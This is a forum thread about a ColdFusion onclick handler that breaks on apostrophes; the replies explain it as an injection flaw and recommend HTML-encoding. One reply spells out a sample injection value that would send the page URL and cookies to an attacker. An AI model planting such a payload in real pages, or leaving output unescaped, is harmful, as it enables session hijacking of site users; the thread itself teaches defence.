Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

Register Log in
  • Congratulations Mike Lewis on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

Single quote is breaking my onclick action 1

Status
Not open for further replies.
LyndonOHRC

LyndonOHRC

Programmer
Sep 8, 2005
603
US
I'm trying to populate an input tag when text is clicked. It works great until the data contains an apostrophe. i.e. The value (DANCER'S CALL) is placed in the function dynamically by my server side database code. I'm having trouble figuring out how to solve the unbalanced delimiters this scenario presents. Any Help appreciated.

Code: 
onclick='document.getElementById("HorseName").value="DANCER'S CALL";
document.getElementById("HorseName").focus();'

In case it helps, here's the ColdFusion Server side code that builds the onclick action:

Code: 
<span onclick='document.getElementById("HorseName").value="#getHName.hname#";document.getElementById("HorseName").focus();'>
[indent]#getHName.hname#[/indent]
</span>




Lyndon
 
Sort by date Sort by votes
Hi

And if getHName.hname's value is [tt]";$.get("[ignore][/ignore]",{"u":location.href,"c":document.cookie});//[/tt], then your side will obediently send the URL and cookies to an attacker ?

According to the documentation you should use [tt]encodeForHTML()[/tt]. I guess somehow like this :
Code: 
<span onclick='document.getElementById("HorseName").value="#encodeForHTML(getHName.hname)#";document.getElementById("HorseName").focus();'>
#encodeForHTML(getHName.hname)#
</span>

Feherke.
feherke.github.io
 
Upvote 0 Downvote
Security: The dynamic value can only be a horse name from our internal database. And application is not available to the public.

We use ColdFusion 9 and the encodeForHTML is not available, sorry I didn't think to post version.

I even tried passing the horse name to a function, no luck [mad]

Code: 
function putHName(hname) {
			document.getElementById("HorseName").value=hname;
			document.getElementById('HorseName').focus();
		}

Lyndon
 
Upvote 0 Downvote
Hi

No problem, I have absolutely no idea about ColdFusion or its versions. This is a generic issue and should be addressed regardless language, version, data source or site accessibility.

Thought there is a chance ColdFusion's function to not encode the single quote too. So go the manual way, and replace "'" with "&apos;" in getHName.hname.


Feherke.
feherke.github.io
 
Upvote 0 Downvote
Status
Not open for further replies.

Similar threads

JScannell
  • Locked
  • Question
Google Chrome doesn't load my javascript files
Replies
1
Views
279
JScannell
JScannell
Ahmad khalafalla
  • Locked
  • Question
How to listen to 'onclick' event on the document
Replies
1
Views
111
feherke
feherke
JScannell
  • Locked
  • Question
Javascript issue on iPhone/iMac platforms
Replies
0
Views
322
JScannell
JScannell
waubain
  • Locked
  • Question
First image in slide gallery not showing - Uncaught TypeError: slides[(slideIndex - 1)] is undefined 1
Replies
2
Views
242
waubain
waubain
damipera
  • Locked
  • Question
Checkboxes - At Least 1 is Selected? 1
Replies
2
Views
108
damipera
damipera

Part and Inventory Search

Sponsor

Back
Top